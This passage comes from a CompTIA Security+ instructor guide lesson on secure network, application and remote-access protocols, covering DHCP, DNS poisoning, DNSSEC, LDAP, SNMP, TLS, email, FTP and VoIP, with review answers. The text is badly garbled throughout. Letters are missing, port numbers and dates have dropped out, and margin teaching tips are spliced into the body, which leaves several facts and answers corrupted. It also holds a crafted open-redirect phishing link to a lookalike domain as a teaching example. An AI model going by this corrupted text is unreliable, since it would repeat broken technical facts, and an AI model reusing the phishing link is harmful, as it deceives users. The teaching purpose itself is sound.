allocation , but is nabling the D C snooping port security feature on a switch can mitigate rogue D C
important enough to attacks. indows D C servers in an AD environment automatically log any traffic
spend some time on. detected from unauthori ed D C servers. More generally, administration of the
D C server itself must be carefully controlled and the settings checked regularly. If an
attacker compromises the D C server, he or she could point network clients to rogue
DN servers and use that as a means to direct users to spoofed websites. Another
attack is to redirect traffic through the attacker's machine by changing the default
gateway, enabling the attacker to snoop on all network traffic.

esson 11 Implementing Secure etwork Protocols | Topic 11A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 285

Attacking network address allocation a script exhausts the CP pool while another runs a rogue
CP server. A third tool operates a rogue S to supply spoofed information to clients configured to
use the attack machine as a S server, via the rogue CP configuration.

Domain Name Resolution Show Slide(s)

The Domain Name ystem DN resolves fully ualified domain names DNs to I Domain Name
addresses. It uses a distributed database system that contains information on domains esolution
and hosts within those domains. The information is distributed among many name
servers, each of which holds part of the database. The name servers work over port . Teaching
Domain name resolution is a security critical service and the target of many attacks on Tip
both local network and the Internet. opefully students
understand the basic
omain i ac in function of DN and
the use of resource
Domain hijacking is an attack where an adversary ac uires a domain for a company's records. The attacks
trading name or trademark, or perhaps some spelling variation thereof. hile there shown here focus on
the registration of
are often trademark and intellectual property laws against doing this, companies need
domains.
to be careful to renew domain names that they want to continue to use and to protect
the credentials used to manage the registration. A domain name must be re registered
every year.
In a domain hi acking attack an adversary gains control over the registration of a
domain name, allowing the host records to be configured to I addresses of the
attacker's choosing. This might be accomplished by supplying false credentials to the
domain registrar when applying for a new domain name or re registering an e isting
one. An attacker might also be able to e ploit the legitimate account used to manage
the domain via a weak password or malware installed on a client computer or even
to compromise the domain registrar's security procedures in some way upguard.com
blog domain hi acking .

esson 11 Implementing Secure etwork Protocols | Topic 11A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 286 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

A company whose domain has been hi acked is likely to find that they are locked out
of the registrar's management console, or that the domain has been transferred to
another registrar, often operating in a di erent country. The whois command can be
used to lookup domain registration information to try to detect misuse in other cases.

Uniform Resource Locator (URL) Redirection

A uniform resource locator L is an address for the pages and files published
as websites. A L comprises a DN, file path, and often script parameters. L
redirection refers to the use of TT redirects to open a page other than the one
the user re uested. This is often used for legitimate purposes to send the user to a
login page or to send a mobile device browser to a responsive version of the site, for
instance. If the redirect is not properly validated by the web application, an attacker
can craft a phishing link that might appear legitimate to a na ve user, such as
https://trusted.foo/login.php?url="https://
tru5ted.foo"
A threat actor could also compromise a web server and add redirects in .htaccess files.
A redirect could also be inserted as Java cript, either through compromising the server
or by uploading a script via a poorly validated form.

Show Slide(s) Domain Reputation

If your domain, website, or email servers have been hi acked, they are likely to be used
DN oisoning for spam or distributing malware. This will lead to complaints and the likelihood of the
domain being listed on a blacklist. ou should set up monitoring using a site such as
Teaching
talosintelligence.com reputation center to detect misuse early.
Tip
Most es will use
T before any oisonin
other type of name
resolution, though DNS poisoning is an attack that compromises the process by which clients uery
this behavior can be name servers to locate the I address for a DN. There are several ways that a DN
changed. poisoning attack can be perpetrated.
The syllabus isn't
specific about client Man in the Middle
versus server side
cache poisoning. If the threat actor has access to the same local network as the victim, the attacker can
erver side is much
use A poisoning to respond to DN ueries from the victim with spoofed replies.
harder to achieve.
ne well known DN This might be combined with a denial of service attack on the victim's legitimate DN
server cache poisoning server. A rogue D C could be used to configure clients with the address of a rogue
e ploit involves a DN resolver.
weakly generated
transaction ID, used DNS Client Cache Poisoning
as a rudimentary form
of authentication efore DN was developed in the s, name resolution took place using a te t file
when a DN client
named T . ach name I address mapping was recorded in this file and system
or server makes a
re uest to another administrators had to download the latest copy and install it on each Internet client
server to resolve a or server manually. ven though all name resolution now functions through DN , the
domain name. An T file is still present and most operating systems check the file before using DN .
attacker able to guess Its contents are loaded into a cache of known name I mappings and the client only
these parameters contacts a DN server if the name is not cached. Therefore, if an attacker is able to
might be able to reply
place a false name I address mapping in the T file and e ectively poison the DN
with a false address
secureworks.com cache, he or she will be able to redirect traffic. The T file re uires administrator
blog dns cache access to modify. In NI and Linu systems it is stored as etc hosts, while in indows
poisoning . it is placed in ystem oot ystem Drivers etc hosts.

esson 11 Implementing Secure etwork Protocols | Topic 11A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 287

DNS Server Cache Poisoning

DN server cache poisoning aims to corrupt the records held by the DN server
itself. This can be accomplished by performing Do against the server that holds the
authori ed records for the domain, and then spoofing replies to re uests from other
name servers. Another attack involves getting the victim name server to respond to
a recursive uery from the attacking host. A recursive uery compels the DN server
to uery the authoritative server for the answer on behalf of the client. The attacker's
DN , mas uerading as the authoritative name server, responds with the answer to
the uery, but also includes a lot of false domain I mappings for other domains that
the victim DN accepts as genuine. The nslookup or dig tool can be used to uery
the name records and cached records held by a server to discover whether any false
records have been inserted.

DNS Security Show Slide(s)

DN is a critical service that should be configured to be fault tolerant. Do attacks DN ecurity

are hard to perform against the servers that perform Internet name resolution, but if
an attacker can target the DN server on a private network, it is possible to seriously Teaching
disrupt the operation of that network. Tip
To ensure DN security on a private network, local DN servers should only accept The ma ority of Top
Level Domains TLDs
recursive ueries from local hosts preferably authenticated local hosts and not from
and country code TLDs
the Internet. ou also need to implement access control measures on the server, to are signed. therwise,
prevent a malicious user from altering records manually. imilarly, clients should be adoption of DN C
restricted to using authori ed resolvers to perform name resolution. is patchy e cept in
the .gov domain. ou
Attacks on DN may also target the server application and or configuration. Many can refer students
DN services run on IND erkley Internet Name Domain , distributed by the Internet to charts about
oftware Consortium isc.org . There are known vulnerabilities in many versions of the DN C adoption at
IND server, so it is critical to patch the server to the latest version. The same general internetsociety.org
advice applies to other DN server software, such as Microsoft's. btain and check deploy dnssec
statistics.
security announcements and then test and apply critical and security related patches
and upgrades.
DN footprinting means obtaining information about a private network by using
its DN server to perform a one transfer all the records in a domain to a rogue
DN or simply by uerying the DN service, using a tool such as nslookup or
dig. To prevent this, you can apply an Access Control List to prevent one transfers
to unauthori ed hosts or domains, to prevent an e ternal server from obtaining
information about the private network architecture.
DNS Security Extensions (DNSSEC) help to mitigate against spoofing and poisoning
attacks by providing a validation process for DN responses. ith DN C enabled,
the authoritative server for the one creates a package of resource records called an
set signed with a private key the one igning ey . hen another server re uests
a secure record e change, the authoritative server returns the package along with its
public key, which can be used to verify the signature.
The public one signing key is itself signed with a separate ey igning ey. eparate
keys are used so that if there is some sort of compromise of the one signing key, the
domain can continue to operate securely by revoking the compromised key and issuing
a new one.

esson 11 Implementing Secure etwork Protocols | Topic 11A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 288 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

indows Server S services with SSEC enabled. (Screenshot used with permission from icrosoft.)

The ey igning ey for a particular domain is validated by the parent domain or

host I . The top level domain trusts are validated by the egional Internet egistries
and the DN root servers are self validated, using a type of M of N control group key
signing. This establishes a chain of trust from the root servers down to any particular
subdomain.

Show Slide(s) ecure irector er ices

ecure Directory
A network directory lists the sub ects principally users, computers, and services and
ervices ob ects such as directories and files available on the network plus the permissions
that sub ects have over ob ects. A directory facilitates authentication and authori ation,
Teaching and it is critical that it be maintained as a highly secure service. Most directory services
Tip are based on the Lightweight Directory Access Protocol (LDAP), running over port
sing TL as part . The basic protocol provides no security and all transmissions are in plainte t,
of A L TA TTL making it vulnerable to sniffing and man in the middle attacks. Authentication
is referred to as referred to as binding to the server can be implemented in the following ways
opportunistic
encryption. • No authentication anonymous access is granted to the directory.

• imple bind the client must supply its distinguished name DN and password, but
these are passed as plainte t.

• imple Authentication and ecurity Layer A L the client and server negotiate
the use of a supported authentication mechanism, such as erberos. The TA TTL
command can be used to re uire encryption sealing and message integrity
signing . This is the preferred mechanism for Microsoft's Active Directory AD
implementation of LDA .

• LDAP Secure (LDAPS) the server is installed with a digital certificate, which it uses
to set up a secure tunnel for the user credential e change. LDA uses port .

esson 11 Implementing Secure etwork Protocols | Topic 11A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 289

If secure access is re uired, anonymous and simple authentication access methods

should be disabled on the server.
enerally two levels of access will need to be granted on the directory read only
access uery and read write access update . This is implemented using an access
control policy, but the precise mechanism is vendor specific and not specified by the
LDA standards documentation.
nless hosting a public service, the LDA directory server should also only be
accessible from the private network. This means that the LDA port should be blocked
by a firewall from access over the public interface. If there is integration with other
services over the Internet, ideally only authori ed I s should be permitted.

Time Synchronization Show Slide(s)

Many applications on networks are time dependent and time critical. These include Time ynchroni ation
authentication and security mechanisms, scheduling applications, and backup
software. The Network Time rotocol NT provides a transport over which to
Teaching
synchroni e these time dependent applications. NT works over D on port .
Tip
Top level NT servers stratum obtain the Coordinated niversal Time TC from Most authentication
a highly accurate clock source, such as an atomic clock. Lower tier servers then and access control
obtain the TC from multiple stratum servers and sample the results to obtain an protocols are critically
authoritative time. Most organi ations will use one of these stratum servers to obtain dependent on time
synchroni ation.
the time for use on the LAN. ervers at lower tiers may then perform the same sort of Note the impact on
sampling operation, ad ust for the delay involved in propagating the signal, and provide forensics and log
the time to clients. Clients themselves usually obtain the time using a modified form of analysis. If anyone's
the protocol imple NT . confused by the
abbreviation TC,
NT has historically lacked any sort of security mechanism, but there are moves e plain that it's
to create a security e tension for the protocol called Network Time ecurity language independent
blog.cloud are.com secure time . to keep both the
ritish and the rench
happy or unhappy,
Simple Network Management Protocol Security perhaps .

The Simple Network Management Protocol (SNMP) is a widely used framework for Show Slide(s)
management and monitoring. NM consists of an NM monitor and agents.
• The agent is a process software or firmware running on a switch, router, server, or imple Network
Management rotocol
other NM compatible network device.
ecurity
• This agent maintains a database called a management information base MI that
Teaching
holds statistics relating to the activity of the device for e ample, the number of
Tip
frames per second handled by a switch . The agent is also capable of initiating a trap
NM is one of those
operation where it informs the management system of a notable event port failure,
services that should
for instance . The threshold for triggering traps can be set for each value. Device be shut down if it is
ueries take place over port D traps are communicated over port also not being used. NM
D . may run on devices
such as switches,
• The NM monitor a software program provides a location from which network firewalls, and printers.
activity can be overseen. It monitors all agents by polling them at regular intervals
for information from their MI s and displays the information for review. It also
displays any trap operations as alerts for the network administrator to assess and
act upon as necessary.

If NM is not used, you should remember to change the default configuration

password and disable it on any NM capable devices that you add to the network. If
you are running NM v or v c, keep to the following guidelines
• NM community names are sent in plainte t and so should not be transmitted
over the network if there is any risk that they could be intercepted.

esson 11 Implementing Secure etwork Protocols | Topic 11A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 290 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

• se difficult to guess community names never leave the community name blank or
set to the default.

• se Access Control Lists to restrict management operations to known hosts that is,
restrict to one or two host I addresses .

• NM v supports encryption and strong user based authentication. Instead of

community names, the agent is configured with a list of usernames and access
permissions. hen authentication is re uired, the NM message is signed with a
hash of the user's passphrase. The agent can verify the signature and authenticate
the user using its own record of the passphrase.

esson 11 Implementing Secure etwork Protocols | Topic 11A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 291

Review Activity:
Secure et ork perations rotocols
Answer the following uestions

1. What vulnerabilities does a rogue DHCP server expose users to?

Denial of service providing an invalid address configuration and spoofing providing a

malicious address configuration one that points to a malicious DN , for instance .

2. Why is it vital to ensure the security of an organization's DNS service?

DN resolves domain names. If it were to be corrupted, users could be directed to

spoofed websites. Disrupting DN can also perform denial of service.

3. True or alse The contents o the T file are irrele ant as lon as a
ser ice is properl confi ured

alse probably the contents of the T file are written to the DN cache on
startup. It is possible to edit the registry to prioriti e DN over T , though.

4. What is DNS server cache poisoning?

Corrupting the records of a DN server to point traffic destined for a legitimate domain
to a malicious I address.

5. True or false? DNSSEC depends on a chain of trust from the root

ser ers do n

True.

6. What are the advantages of SASL over LDAPS?

The imple Authentication and ecurity Layer A L allows a choice of authentication

providers and encryption sealing integrity signing mechanisms. y contrast, LDA
uses Transport Layer ecurity TL to encrypt traffic, but users still authenticate via
simple binding. Also, A L is the standards based means of configuring LDA security.

7. What steps should you take to secure an SNMPv2 service?

Configure strong community names and use access control lists to restrict
management operations to known hosts.

esson 11 Implementing Secure etwork Protocols | Topic 11A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 292 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Topic 11B
Implement Secure Application rotocols

Teaching EXAM OBJECTIVES COVERED

Tip .1 Explain the importance of security concepts in an enterprise environment
3.1 Given a scenario, implement secure protocols
This topic looks at
security and message
authentication and
confidentiality for The network infrastructure of switches, routers, access points, and secure hosts is
web, file transfer,
implemented for the purpose of running services. The application protocols that
and communications
protocols, such as enable web, email, and oI re uire secure configuration too.
email and oI .
As well as sections of Hypertext Transfer Protocol and Web Services
the . ob ective, this
topic covers TL and The foundation of web technology is the HyperText Transfer Protocol (HTTP). TT
A I considerations
enables clients typically web browsers to re uest resources from an TT server. A
from the . ob ective.
client connects to the TT server using an appropriate TC port the default is port
Show Slide(s) and submits a re uest for a resource, using a uniform resource locator L . The
server acknowledges the re uest and responds with the data or an error message .
yperte t Transfer The response and re uest formats are defined in an TT header. The TT payload
rotocol and eb is usually used to serve TML web pages, which are plain te t files with coded tags
ervices
yperTe t Markup Language describing how the page should be formatted. A web
Teaching browser can interpret the tags and display the te t and other resources associated with
Tip the page, such as binary picture or sound files linked to the TML page.
tress that TT TT also features a forms mechanism T whereby a user can submit data from
transfers all the client to the server. TT is nominally a stateless protocol this means that the
information in server preserves no information about the client during a session. owever, the
plain te t and can
basic functionality of TT servers is often e tended by support for scripting and
be intercepted by
a packet sni er on programmable features web applications . ervers can also set te t file cookies to
the same network preserve session information. These coding features plus integration with databases
segment. increase e ibility and interactivity, but also the attack surface and e pose more
vulnerabilities.

any argue that TTP is a stateful protocol. ersion of TTP adds more state-preserving
features (blog.zamicol.com 01 0 is-http -stateful-protocol-application.html).

Show Slide(s)

Transport Layer
Transport a er ecurit
ecurity
As with other early TC I application protocols, TT communications are not
Teaching
secured. ecure ockets Layer L was developed by Netscape in the s to
Tip
address the lack of security in TT . L proved very popular with the industry, and
it was uickly adopted as a standard named Transport Layer Security (TLS). It is
oint out that L
can be used with
typically used with the TT application referred to as TT or TT ecure but can
applications other also be used to secure other application protocols and as a virtual private networking
than TT . N solution.

esson 11 Implementing Secure etwork Protocols | Topic 11

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 293

To implement TL , a server is assigned a digital certificate signed by some trusted Interaction

certificate authority CA . The certificate proves the identity of the server assuming that Opportunity
the client trusts the CA and validates the server's public private key pair. The server If there is time, get
uses its key pair and the TL protocol to agree mutually supported ciphers with the students to e amine
client and negotiate an encrypted communications session. the TL . and TL
. handshakes in a
TTPS operates over port by default. TTPS operation is indicated by using https for packet capture. ou
can also note the use
the U and by a padlock icon shown in the browser.
of about config to
modify the default
version preferences
for the browser.
It is also possible to install a certificate on the client so that the server can trust the
client. This is not often used on the web but is a feature of Ns and enterprise
networks that re uire mutual authentication.

T ersions Teaching
Tip
hile the acronym L is still used, the Transport Layer ecurity versions are the only
This Cloud are blog
ones that are safe to use. A server can provide support for legacy clients, but obviously provides an e cellent
this is less secure. or e ample, a TL . server could be configured to allow clients to overview of the
downgrade to TL . or . or even L . if they do not support TL . . problems with earlier
TL versions for
A downgrade attack is where a man-in-the-middle tries to force the use of a weak cipher students who want
more detail blog.
suite and SS T S version.
cloud are.com rfc
aka tls .

TL version . was approved in . ne of the main features of TL . is the

removal of the ability to perform downgrade attacks by preventing the use of unsecure
features and algorithms from previous versions. There are also changes to the
handshake protocol to reduce the number of messages and speed up connections.

Cipher Suites
A cipher suite is the algorithms supported by both the client and server to perform the
di erent encryption and hashing operations re uired by the protocol. rior to TL . ,
a cipher suite would be written in the following form
ECDHE-RSA-AES128-GCM-SHA256
This means that the server can use lliptic Curve Diffie ellman phemeral mode for
session key agreement, A signatures, bit A CM alois Counter Mode for
symmetric bulk encryption, and bit A for MAC functions. uites the server
prefers are listed earlier in its supported cipher list.
TL . uses simplified and shortened suites. A typical TL . cipher suite appears
as follows
TLS_AES_256_GCM_SHA384
nly ephemeral key agreement is supported in . and the signature type is supplied
in the certificate, so the cipher suite only lists the bulk encryption key strength and
mode of operation A CM , plus the cryptographic hash algorithm A
used within the new hash key derivation function D . D is the mechanism by
which the shared secret established by D key agreement is used to derive symmetric
session keys.

esson 11 Implementing Secure etwork Protocols | Topic 11

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 294 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Teaching
Tip
tudents may uestion
why the version field
reads TL . . This
field is prone to a
compatibility problem
when servers cannot
identify a new version.
As a workaround,
servers supporting
TL . should use the
supported versions
e tension instead.

iewing the T S handshake in a ireshark packet capture. ote that the connection is using T S 1.
and one of the shortened cipher suites (T S AES 6 GC S A ).

Show Slide(s) API Considerations

A I Considerations
TT is now used less to serve static web pages, and more to create web applications,
often as part of a cloud product. An enterprise might use both public web applications
Teaching over the Internet and private ones. The primary means of configuring and managing a
Tip web application is via its application programming interface (API). or e ample, an
application might allow a user account to be created via a L
elp students to
recogni e code https://example.foo/api/users?api_key=123456
samples for when
an A I is being The developer uses the T method to submit data to the L with the re uired
used and stress the parameters coded into the re uest body, often in Java cript b ect Notation J N .
importance of secrets
management. e will POST /api/users HTTP/1.1
revisit this topic in the
lesson on cloud. Content-Type: application/json
{
"user": {
"name": "James",
"email": "[email protected]"
}
}
se of these A Is is authori ed via a token or secret key. ective management of
these A I secrets is a key consideration in modern networks, as they have been widely
used to perpetrate various breaches and data thefts. or e ample, putting the key in

esson 11 Implementing Secure etwork Protocols | Topic 11

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 295

the L carries a severe risk of e posure. A Is can use more secure authentication
and authori ation methods, such as AML and Auth, but these still come with
secrets management re uirements. Another A I consideration is that usage should be
monitored to ensure only authori ed endpoints are making transactions.

Subscription Services Show Slide(s)

mployees may re uire access to all kinds of subscription services. ome e amples ubscription ervices
include
• Market and financial intelligence and information.

• ecurity threat intelligence and information.

• eference and training materials in various formats ebook and video, for instance .

• oftware applications and cloud services paid for by subscription rather than
permanent licenses.

Most of this sort of content will be delivered by a secure web site or cloud application.
It may be necessary to provision authentication mechanisms for enterprise single sign
on access to the services.
Another use of subscriptions is a web feed, where updated articles or news items
are pushed to the client or browser. eb feeds are based on either the eally imple
yndication or Atom formats, both of which use ML to mark up each document
supplied by the feed. It is possible that such feeds may be vulnerable to XML injection
style attacks, allowing an attacker to show malicious links or even interact with the file
system https mikeknoop.com l ml e e ploit .

Subscription services may also describe the outsourcing of network and security
components and procedures. There may also be subscription use of enterprise cloud
applications, which may be mediated by an access broker.

File Transfer Services Show Slide(s)

There are many means of transferring files across networks. A network operating ile Transfer ervices
system can host shared folders and files, enabling them to be copied or accessed over
the local network or via remote access over a N, for instance . mail and messaging Teaching
apps can send files as attachments. TT supports file download and uploads via Tip
various scripting mechanisms . There are also peer to peer file sharing services. Make sure students
Despite the availability of these newer protocols and services, the file transfer protocol know the di erences
T remains very popular because it is efficient and has wide cross platform support. between T , T ,
and T , including
ile Trans er rotocol which ports are
associated with which
A File Transfer Protocol (FTP) server is typically configured with several public variant.
directories, hosting files, and user accounts. Most TT servers also function as T
servers, and T services, accounts, and directories may be installed and enabled
by default when you install a web server. T is more efficient compared to file
attachments or TT file transfer, but has no security mechanisms. All authentication
and data transfer are communicated as plain te t, meaning that credentials can easily
be picked out of any intercepted T traffic.

You should check that users do not install unauthorized servers on their PCs (a rogue
server). or example, a version of IIS that includes TTP, TP, and S TP servers is shipped
with client versions of indows, though it is not installed by default.

esson 11 Implementing Secure etwork Protocols | Topic 11

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 296 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

SSH FTP (SFTP) and FTP Over SSL (FTPS)

SSH FTP (SFTP) addresses the privacy and integrity issues of T by encrypting the
authentication and data transfer between client and server. In T , a secure link
is created between the client and server using ecure hell over TC port .
rdinary T commands and data transfer can then be sent over the secure link
without risk of eavesdropping or man in the middle attacks. This solution re uires an
server that supports T and T client software.
Another means of securing T is to use the connection security protocol L TL .
There are two means of doing this
• plicit TL T use the A T TL command to upgrade an unsecure
connection established over port to a secure one. This protects authentication
credentials. The data connection for the actual file transfers can also be encrypted
using the T command .

• Implicit TLS (FTPS) negotiate an L TL tunnel before the e change of any T

commands. This mode uses the secure port for the control connection.

T is tricky to configure when there are firewalls between the client and server.
Conse uently, T is usually the preferred method.

Show Slide(s) Email Services

mail ervices
mail services use two types of protocols
• The Simple Mail Transfer Protocol (SMTP) specifies how mail is sent from one
Teaching system to another.
Tip
Make sure students • A mailbo protocol stores messages for users and allows them to download them to
understand the client computers or manage them on the server.
di erence between
mail transfer and
mailbo access.
Secure SMTP (SMTPS)
To deliver a message, the MT server of the sender discovers the I address of the
recipient MT server using the domain name part of the email address. The MT
server for the domain is registered in DN using a Mail changer M record.
MT communications can be secured using TL . This works much like TT with a
certificate on the MT server. There are two ways for MT to use TL
• TA TTL this is a command that upgrades an e isting unsecure connection to use
TL . This is also referred to as e plicit TL or opportunistic TL .

• MT this establishes the secure connection before any MT commands L ,

for instance are e changed. This is also referred to as implicit TL .

The TA TTL method is generally more widely implemented than MT . Typical

MT configurations use the following ports and secure services
• ort used for message relay between MT servers or Message Transfer
Agents MTA . If security is re uired and supported by both servers, the TA TTL
command can be used to set up the secure connection.

• ort used by mail clients Message ubmission Agents M A to submit

messages for delivery by an MT server. ervers configured to support port
should use TA TTL and re uire authentication before message submission.

• ort some providers and mail clients use this port for message submission
over implicit TL MT , though this usage is now deprecated by standards
documentation.

esson 11 Implementing Secure etwork Protocols | Topic 11

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 297

Secure POP (POP3S)

The ost ce rotocol is a mailbo protocol designed to store the
messages delivered by MT on a server. hen the client connects to the mailbo ,
downloads the messages to the recipient's email client.

Show Slide(s)

ecure Multipurpose
Internet Mail
Configuring mailbox access protocols on a server. tensions

Teaching
A client application, such as Microsoft utlook or Mo illa Thunderbird, Tip
establishes a TC connection to the server over port . The user is
tress the di erence
authenticated by username and password and the contents of his or her mailbo between providing
are downloaded for processing on the local C. is the secured version of the secure ports for
protocol, operating over TC port by default. accessing MT and
mailbo profiles with
Secure IMAP (IMAPS) the use of MIM to
authenticate senders
Compared to , the Internet Message Access Protocol v4 (IMAP4) supports and encrypt messages.
permanent connections to a server and connecting multiple clients to the same ou might also want
mailbo simultaneously. It also allows a client to manage mail folders on the server. to mention policy
based encryption. This
Clients connect to IMA over TC port . They authenticate themselves then retrieve re uires the use of
messages from the designated folders. As with other email protocols, the connection can MIM if there are
be secured by establishing an L TL tunnel. The default port for IMA is TC port . matches to keywords
in a certain message.
If the recipient is
ecure ultipurpose Internet ail tensions unknown e ternal
to the organi ation,
Connection security goes a long way toward preventing the compromise of email the message is held
accounts and the spoofing of email, but end to end encryption cannot usually be until a certificate has
guaranteed. Conse uently, there is still a need for authentication and confidentiality been issued to them
to be applied on a per message basis. ne means of doing this is called Secure/ knowledge.broadcom.
com e ternal
Multipurpose Internet Mail Extensions (S/MIME). To use MIM , the user is issued a
article
digital certificate containing his or her public key, signed by a CA to establish its validity. define a policy based
The public key is a pair with a private key kept secret by the user. To establish the encryption essenti.
e change of secure emails, both users must be using MIM and e change certificates html .

esson 11 Implementing Secure etwork Protocols | Topic 11

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 298 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

1. Alice sends ob her digital certificate, containing her public key and validated
digital ID an email address . he signs this message using her private key.
2. ob uses the public key in the certificate to decode her signature and the
signature of the CA or chain of CAs validating her digital certificate and digital ID
and decides that he can trust Alice and her email address.
3. e responds with his digital certificate and public key and Alice, following the
same process, decides to trust ob.
4. oth Alice and ob now have one another's certificates in their trusted certificate
stores.
5. hen Alice wants to send ob a confidential message, she makes a hash of
the message and signs the hash using her private key. he then encrypts the
message, hash, and her public key using ob's public key and sends a message to
ob with this data as an MIM attachment.
6. ob receives the message and decrypts the attachment using his private key.
e validates the signature and the integrity of the message by decrypting it with
Alice's public key and comparing her hash value with one he makes himself.

Show Slide(s) oice and ideo er ices

oice and ideo
Voice over IP (VoIP), web conferencing, and video teleconferencing TC solutions
ervices have become standard methods for the provision of business communications. The
main challenges that these applications have in common is that they transfer real time
Teaching data and must create point to point links between hosts on di erent networks.
Tip Implementing Internet telephony and video conferencing brings its own raft of security
This is a section where concerns. ach part of the communications media network infrastructure needs to be
hands on activity is evaluated for threats and vulnerabilities. This includes protocols, servers, handsets,
difficult to implement,
so encourage students
and software. The protocols designed to support real time services cover one or more
to read vendor of the following functions
implementation
• ession control used to establish, manage, and disestablish communications
guides.
sessions. They handle tasks such as user discovery locating a user on the network ,
tress that encrypting
I only will not
availability advertising whether a user is prepared to receive calls , negotiating session
encrypt the actual call parameters such as use of audio video , and session management and termination.
data.
• Data transport handles the delivery of the actual video or voice information.

• uality of ervice o provides information about the connection to a o

system, which in turn ensures that voice or video communications are free from
problems such as dropped packets, delay, or itter.

The Session Initiation Protocol (SIP) is one of the most widely used session control
protocols. I endpoints are the end user devices also known as user agents , such
as I enabled handsets or client and server web conference software. ach device,
conference, or telephony user is assigned a uni ue I address known as a I niform
esource Indicator I , such as sip bob.dobbs comptia.org
I endpoints can establish communications directly in a peer to peer architecture,
but it is more typical to use intermediary servers and directory servers. A I network
may also use gateways and private branch e change appliances to provide an
interface between the oI network and e ternal telephone and cellular networks.
hile I provides session management features, the actual delivery of real time data
uses di erent protocols. The principal one is Real-time Transport Protocol (RTP).
A threat actor could e ploit unencrypted voice and video communications to try
to intercept passwords, credit card details, and so on. ithout strong mutual
authentication, connections are also vulnerable to man in the middle attacks.

esson 11 Implementing Secure etwork Protocols | Topic 11

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 299

Enabling SIP T S security on a C P oIP softphone.

(Screenshot used with permission from C .)

Connection security for voice and video works in a similar manner to TT . To initiate
the call, the secure version I uses digital certificates to authenticate the endpoints
and establish a TL tunnel. here unencrypted I typically runs over TC port ,
I uses TC port . The secure connection established by I can also be used
to generate a master key to use with the secure versions of the transport protocol
(SRTP). T provides confidentiality for the actual call data.

Enforcing TP protocol encryption on a itel P system.

(Screenshot used with permission from itel.)

esson 11 Implementing Secure etwork Protocols | Topic 11

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 300 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Review Activity:
Secure Application rotocols
Answer the following uestions

1. What type of attack against HTTPS aims to force the server to negotiate
weak ciphers?

A downgrade attack.

2. A client and server have agreed on the use of the cipher suite ECDHE-ECDSA-
AES256- GCM-SHA384 for a TLS session. What is the key strength of the
symmetric encryption algorithm?

bit A .

3. What security protocol does SFTP use to protect the connection and which
port does an SFTP server listen on by default?

ecure hell over TC port .

4. Which port(s) and security methods should be used by a mail client to

submit messages for delivery by an SMTP server?

ort with TA TTL e plicit TL or port with implicit TL .

5. When using S/MIME, which key is used to encrypt a message?

The recipient's public key principally . The public key is used to encrypt a symmetric
session key and for performance reasons the session key does the actual data
encoding. The session key and, therefore, the message te t can then only be recovered
by the recipient, who uses the linked private key to decrypt it.

6. Which protocol protects the contents of a VoIP conversation from

eavesdropping?

ncrypted oI data is carried over the ecure eal time Transport rotocol T .

esson 11 Implementing Secure etwork Protocols | Topic 11

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 301

Topic 11C
Implement Secure Remote
Access rotocols

EXAM OBJECTIVES COVERED Teaching

3.1 Given a scenario, implement secure protocols Tip
3.3 Given a scenario, implement secure network designs tudents can find N
.1 Given a scenario, use the appropriate tool to assess organizational security (SS only) and I ec concepts
challenging, so
allocate plenty of time
ith today's mobile workforce, most networks have to support connections by remote to this topic.
employees, contractors, and customers to their network resources. These remote
connections often make use of untrusted public networks, such as the Internet.
Conse uently, understanding how to implement secure remote access protocols will
be a ma or part of your ob as an information security professional.
There are also many cases where a user needs to remotely access an individual host.
This is most commonly implemented to allow administrators to perform remote
management of workstations, servers, and network appliances, but it can also be used
to provide ordinary users access to a desktop as well.

emote Access Architecture Show Slide(s)

emote access means that the user's device does not make a direct cabled or wireless emote Access
connection to the network. The connection occurs over or through an intermediate Architecture
network. istorically, remote access might have used analog modems connecting over
the telephone system or possibly a private link a leased line . These days, most remote Teaching
access is implemented as a virtual private network (VPN), running over the Internet. Tip
Administering remote access involves essentially the same tasks as administering According to some
the local network. nly authori ed users should be allowed access to local network definitions, a N
resources and communication channels. Additional comple ity comes about because need not be secure.
it can be more difficult to ensure the security of remote workstations and servers and owever, this is
what most people
